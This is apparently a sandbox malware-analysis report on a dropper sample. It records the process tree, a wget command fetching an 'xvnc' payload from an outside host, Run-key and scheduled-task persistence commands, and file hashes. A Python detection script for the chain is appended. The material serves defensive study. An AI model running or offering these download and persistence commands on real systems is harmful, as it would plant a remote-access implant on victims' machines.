Overview
Score: 10

Static: 10

Behavioral tasks (score, sample, platform):
 3   01/2015.5.27/01.vir      windows7_x64
 3   01/2015.5.27/01.vir      windows10_x64
 1   PER-DCOMP-...ao.dll      windows7_x64
 1   PER-DCOMP-...ao.dll      windows10_x64
 8   01/2015.5.27/03.exe      windows7_x64
 8   01/2015.5.27/03.exe      windows10_x64
 1   01/2015.5.27/04.exe      windows7_x64
 1   01/2015.5.27/04.exe      windows10_x64
10   01/2015.5.27/05.exe      windows7_x64
10   01/2015.5.27/05.exe      windows10_x64
 7   01/2015.5.27/07.exe      windows7_x64
 7   01/2015.5.27/07.exe      windows10_x64
10   01/2015.5.27/09.exe      windows7_x64
10   01/2015.5.27/09.exe      windows10_x64
10   01/2015.5.27/10.exe      windows7_x64
10   01/2015.5.27/10.exe      windows10_x64
 1   01/2015.5.27/12.pdf      windows7_x64
 1   01/2015.5.27/12.pdf      windows10_x64
 1   01/2015.5.27/13.pdf      windows7_x64
 1   01/2015.5.27/13.pdf      windows10_x64
 8   01/2015.5.27/14.exe      windows7_x64
 8   01/2015.5.27/14.exe      windows10_x64
 1   01/2015.5.27/15.dll      windows7_x64
 1   01/2015.5.27/15.dll      windows10_x64
10   01/2015.5.27/16.rtf      windows7_x64
 1   01/2015.5.27/16.rtf      windows10_x64
 1   01/2015.5.27/17.pdf      windows7_x64
 1   01/2015.5.27/17.pdf      windows10_x64
 1   01/2015.5.27/18.doc      windows7_x64
 1   01/2015.5.27/18.doc      windows10_x64

Analysis
  max time kernel    118s
  max time network   118s
  platform           windows7_x64
  resource           win7-en-20211208
  submitted          28-01-2022 13:34
Behavioral tasks
Task           Sample                     Resource
behavioral1    01/2015.5.27/01.vir        win7-en-20211208
behavioral2    01/2015.5.27/01.vir        win10-en-20211208
behavioral3    PER-DCOMP-Intimacao.dll    win7-en-20211208
behavioral4    PER-DCOMP-Intimacao.dll    win10-en-20211208
behavioral5    01/2015.5.27/03.exe        win7-en-20211208
behavioral6    01/2015.5.27/03.exe        win10-en-20211208
behavioral7    01/2015.5.27/04.exe        win7-en-20211208
behavioral8    01/2015.5.27/04.exe        win10-en-20211208
behavioral9    01/2015.5.27/05.exe        win7-en-20211208
behavioral10   01/2015.5.27/05.exe        win10-en-20211208
behavioral11   01/2015.5.27/07.exe        win7-en-20211208
behavioral12   01/2015.5.27/07.exe        win10-en-20211208
behavioral13   01/2015.5.27/09.exe        win7-en-20211208
behavioral14   01/2015.5.27/09.exe        win10-en-20211208
behavioral15   01/2015.5.27/10.exe        win7-en-20211208
behavioral16   01/2015.5.27/10.exe        win10-en-20211208
behavioral17   01/2015.5.27/12.pdf        win7-en-20211208
behavioral18   01/2015.5.27/12.pdf        win10-en-20211208
behavioral19   01/2015.5.27/13.pdf        win7-en-20211208
behavioral20   01/2015.5.27/13.pdf        win10-en-20211208
behavioral21   01/2015.5.27/14.exe        win7-en-20211208
behavioral22   01/2015.5.27/14.exe        win10-en-20211208
behavioral23   01/2015.5.27/15.dll        win7-en-20211208
behavioral24   01/2015.5.27/15.dll        win10-en-20211208
behavioral25   01/2015.5.27/16.rtf        win7-en-20211208
behavioral26   01/2015.5.27/16.rtf        win10-en-20211208
behavioral27   01/2015.5.27/17.pdf        win7-en-20211208
behavioral28   01/2015.5.27/17.pdf        win10-en-20211208
behavioral29   01/2015.5.27/18.doc        win7-en-20211208
behavioral30   01/2015.5.27/18.doc        win10-en-20211208

The sections that follow are the behavioral5 run: 01/2015.5.27/03.exe on win7-en-20211208 (windows7_x64).
General
  Target   01/2015.5.27/03.exe
  Size     624KB
  MD5      0744320b256d9f8ebf7387982f8efd3d
  SHA1     e103e00c907ecead188a9b6a589f84ed13add671
  SHA256   467f04914a1e6093bdaf5c28884bf95ec738234033b3292d289a0799de196d49
  SHA512   c71c13322d0af3303cd400155f9ea4fec27ccb2ebf4f74132b86f98cdebb79e9a8f58ac2208ece478a973d73f80e0e440d3682f41580fe04c2ab9a26dc5dd406
Malware Config

Signatures

- Executes dropped EXE (1 IoC)
  Process: wget.exe, PID 532

- YARA rule match: upx (4 IoCs, all on the dropped wget.exe)
  C:\Users\Admin\AppData\Local\Temp\wget.exe
  \Users\Admin\AppData\Local\Temp\wget.exe
  C:\Users\Admin\AppData\Local\Temp\wget.exe
  \Users\Admin\AppData\Local\Temp\wget.exe

- Loads dropped DLL (2 IoCs)
  Process: cmd.exe, PID 304 (both loads)

- Adds Run key to start application (2 TTPs, 2 IoCs)
  reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrome-xvnc-v5517 = "C:\\Windows\\system32\\cmd.exe /c start /b C:\\Users\\Admin\\AppData\\Roaming\\Treams\\chrome-xvnc-v5517.exe"
  reg.exe: Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  This is the signature's generic description. Nothing else in this report shows encryption or file destruction; the observed chain fetches chrome-xvnc-v5517.exe with wget and registers it for persistence.

- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Suspicious use of WriteProcessMemory (64 IoCs)
  Parent PID (image) -> child PID (image): number of WriteProcessMemory calls recorded
  1536 03.exe       -> 544  WScript.exe    7
  544  WScript.exe  -> 304  cmd.exe        7
  304  cmd.exe      -> 824  chcp.com       7
  304  cmd.exe      -> 1796 notepad.exe    7
  304  cmd.exe      -> 532  wget.exe       7
  304  cmd.exe      -> 1080 schtasks.exe   7
  304  cmd.exe      -> 1740 schtasks.exe   7
  304  cmd.exe      -> 1100 cmd.exe        7
  304  cmd.exe      -> 1104 find.exe       7
  304  cmd.exe      -> 1052 reg.exe        1 (the listing stops at 64 entries)
Processes

[1] C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\03.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\03.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tron.vbs"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c tron.cmd
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\chcp.com
          Command line: chcp 1251
      [4] C:\Windows\SysWOW64\notepad.exe
          Command line: notepad.exe "C:\Users\Admin\AppData\Local\Temp\SystemsErrorOpeningTheDocumentMicrosoftOfficeOfFri 01/28/2022.doc"
      [4] C:\Users\Admin\AppData\Local\Temp\wget.exe
          Command line: wget.exe -N http://prestigeclub.frantov.com.ua/press-center/press/chrome-xvnc-v5517.exe
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Delete /tn ChromeUpdates_ups /f
      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Delete /tn Trons_ups /f
      [4] C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" ver "
      [4] C:\Windows\SysWOW64\find.exe
          Command line: find "Microsoft Windows XP"
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v chrome-xvnc-v5517 /t REG_EXPAND_SZ /d "C:\Windows\system32\cmd.exe /c start /b C:\Users\Admin\AppData\Roaming\Treams\chrome-xvnc-v5517.exe" /f
          - Adds Run key to start application
      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /Create /tn Trons_ups /TR "C:\Users\Admin\AppData\Roaming"\Treams\chrome-xvnc-v5517.exe /SC MINUTE /mo 180
          - Creates scheduled task(s)

Reading the tree: [n] is the process depth from the sandbox's tree. The children of the 32-bit sample are recorded with C:\Windows\SysWOW64 image paths even though their command lines name System32; that is WOW64 file-system redirection, not a second copy of the tools. tron.vbs hands off to tron.cmd, which switches the console to code page 1251 (Cyrillic), opens a file named SystemsErrorOpeningTheDocument... in notepad (presumably the decoy), runs ver | find "Microsoft Windows XP" as an OS-version check (the cmd /S /D /c" ver " and find children are the two halves of that pipeline), fetches chrome-xvnc-v5517.exe with the dropped wget.exe (the file matched by the upx YARA rule above), and then installs persistence twice: an HKCU Run value and the Trons_ups task firing every 180 minutes, after first deleting any earlier ChromeUpdates_ups and Trons_ups tasks. Both launchers point at C:\Users\Admin\AppData\Roaming\Treams\chrome-xvnc-v5517.exe. The Run value is REG_EXPAND_SZ and wraps the payload in cmd /c start /b, so a hunt that only inspects the executable named first in each Run value sees cmd.exe rather than the payload; match on the full data string instead. The misplaced quote in the /TR argument ("C:\Users\Admin\AppData\Roaming"\Treams\...) is a usable hunting string in its own right.
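The chain above expressed as detection logic over process-creation telemetry, as an added example that is not part of the sandbox report. The events are constructed Sysmon-style records rebuilt from this report's process tree (plus one benign control and a stand-in launcher pid 1000), and the four rules look for what the report actually records: a script host spawning a shell, a download tool running from a user-writable path with a URL on its command line, a Run value whose data launches from AppData, and a schtasks /Create on a MINUTE schedule pointing into AppData. The rule names, the ProcEvent shape, the USER_WRITABLE path list and the control event are this example's own assumptions.

```python
"""Flag this report's persistence chain in process-creation telemetry. Events are
constructed Sysmon-style records rebuilt from the report's process tree plus one
benign control (pid 1000 is a stand-in launcher); rule logic is this example's own."""
import ntpath
import re
from typing import List, NamedTuple, Optional

# Paths a standard user can write to: persistence launching from here is a stronger signal.
USER_WRITABLE = re.compile(r"\\AppData\\|\\Temp\\|%APPDATA%|%TEMP%", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return ntpath.basename(self.image).lower()

class Finding(NamedTuple):
    rule: str
    pid: int
    detail: str

def run_key_from_user_path(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """reg.exe add ...\\CurrentVersion\\Run whose /d data launches from AppData/Temp."""
    cl = ev.cmdline
    if ev.name != "reg.exe" or not re.search(r"\badd\b", cl, re.I) or not RUN_KEY.search(cl):
        return None
    data = re.search(r"/d\s+(.*)$", cl, re.I)  # whole /d payload, so the cmd /c wrapper does not hide it
    if not data or not USER_WRITABLE.search(data.group(1)):
        return None
    value = re.search(r"/v\s+(\S+)", cl, re.I)
    return Finding("run_key_from_user_path", ev.pid, f"value {value.group(1) if value else '?'}")

def minute_task_from_user_path(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """schtasks /Create on a MINUTE schedule whose /TR target lives under AppData/Temp."""
    cl = ev.cmdline
    if ev.name != "schtasks.exe" or not re.search(r"/create\b", cl, re.I) or not re.search(r"/sc\s+minute\b", cl, re.I):
        return None
    target = re.search(r"/tr\s+(.+?)(?=\s+/[a-z]+\b|$)", cl, re.I)  # /TR value up to the next switch
    if not target or not USER_WRITABLE.search(target.group(1)):
        return None
    name = re.search(r"/tn\s+(\S+)", cl, re.I)
    every = re.search(r"/mo\s+(\d+)", cl, re.I)
    return Finding("minute_task_from_user_path", ev.pid,
                   f"task {name.group(1) if name else '?'} every {every.group(1) if every else '1'} min")

def script_host_spawns_shell(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """WScript/CScript/mshta starting cmd or PowerShell (tron.vbs -> tron.cmd in this report)."""
    if parent and parent.name in SCRIPT_HOSTS and ev.name in SHELLS:
        return Finding("script_host_spawns_shell", ev.pid, f"{parent.name} -> {ev.name}")
    return None

def http_fetch_from_user_path(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """A binary running out of AppData/Temp that is handed a URL on its command line."""
    url = re.search(r"https?://\S+", ev.cmdline, re.I)
    if url and USER_WRITABLE.search(ev.image):
        return Finding("http_fetch_from_user_path", ev.pid, url.group(0))
    return None

RULES = [run_key_from_user_path, minute_task_from_user_path, script_host_spawns_shell, http_fetch_from_user_path]

def analyze(events: List[ProcEvent]) -> List[Finding]:
    """Run every rule over every event, handing each rule the event's parent for context."""
    by_pid = {e.pid: e for e in events}
    hits = (rule(ev, by_pid.get(ev.ppid)) for ev in events for rule in RULES)
    return [h for h in hits if h]

def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image names from the root of the tree down to pid, for triage context."""
    by_pid, chain = {e.pid: e for e in events}, []
    while pid in by_pid and len(chain) < len(events):  # length bound guards against ppid cycles
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain[::-1]

T = r"C:\Users\Admin\AppData\Local\Temp"
EVENTS = [  # constructed from the report's process tree; the last entry is a benign control
    ProcEvent(1536, 1000, T + r"\01\2015.5.27\03.exe", '"' + T + r'\01\2015.5.27\03.exe"'),
    ProcEvent(544, 1536, r"C:\Windows\SysWOW64\WScript.exe", r'"C:\Windows\System32\WScript.exe" "' + T + r'\tron.vbs"'),
    ProcEvent(304, 544, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c tron.cmd'),
    ProcEvent(824, 304, r"C:\Windows\SysWOW64\chcp.com", "chcp 1251"),
    ProcEvent(532, 304, T + r"\wget.exe", "wget.exe -N http://prestigeclub.frantov.com.ua/press-center/press/chrome-xvnc-v5517.exe"),
    ProcEvent(1080, 304, r"C:\Windows\SysWOW64\schtasks.exe", "schtasks /Delete /tn ChromeUpdates_ups /f"),
    ProcEvent(1052, 304, r"C:\Windows\SysWOW64\reg.exe",
              r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v chrome-xvnc-v5517 /t REG_EXPAND_SZ '
              r'/d "C:\Windows\system32\cmd.exe /c start /b C:\Users\Admin\AppData\Roaming\Treams\chrome-xvnc-v5517.exe" /f'),
    ProcEvent(1740, 304, r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks /Create /tn Trons_ups /TR "C:\Users\Admin\AppData\Roaming"\Treams\chrome-xvnc-v5517.exe /SC MINUTE /mo 180'),
    ProcEvent(2000, 1000, r"C:\Windows\System32\reg.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Program Files\Vendor\updater.exe" /f'),
]
```

Running `analyze(EVENTS)` yields one finding per stage of the chain (PIDs 304, 532, 1052 and 1740) and nothing for the control Run entry that points into Program Files; `ancestry(EVENTS, 1740)` gives the 03.exe > wscript.exe > cmd.exe > schtasks.exe path a responder would want next to the alert. The Run-key rule deliberately scans the whole /d payload rather than its first token, because the report's value starts with cmd.exe and only names the real target after `start /b`.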
Network

MITRE ATT&CK Matrix (ATT&CK v6)
Downloads

C:\Users\Admin\AppData\Local\Temp\tron.cmd
  MD5     262777e5e1da79784c08acbb2002c169
  SHA1    f24eaca19cac7b72a95f116690330b477df4bb04
  SHA256  068b9a9194efacc16cf142814e79b7041b6ab3d671a95bb508dbd30061c324aa
  SHA512  16f678aad5de8847cb065e828bbf14913383bdc4910fdbca1b21cc16f7b0d859260546ae68fc3739b199d878116e10c5dc5995f5379c51335af8c382849f1285

C:\Users\Admin\AppData\Local\Temp\tron.vbs
  MD5     3b8cdcc376903e45eeca70d2c6a3c435
  SHA1    379a2959a263c74fbc7d6dec98ceab9700d77742
  SHA256  42b4c39179f76ea9eb5835b55a3cf4d8dbb29d42ee0622ad2e89ca48d01e8988
  SHA512  a331e2237be54e496220cf335d52810036fdf21eecc3eb5cb08ced6add348d9a54da8e032e67e7d52d9e6fbe1fe46b0f829306fb50f351606f4b6126fb5faa12

C:\Users\Admin\AppData\Local\Temp\wget.exe (also listed as \Users\Admin\AppData\Local\Temp\wget.exe; all four entries carry the same hashes)
  MD5     bd126a7b59d5d1f97ba89a3e71425731
  SHA1    457b1cd985ed07baffd8c66ff40e9c1b6da93753
  SHA256  a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
  SHA512  3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

memory/304-66-0x0000000000440000-0x0000000000441000-memory.dmp
  Filesize 4KB

memory/1536-54-0x0000000075D51000-0x0000000075D53000-memory.dmp
  Filesize 8KB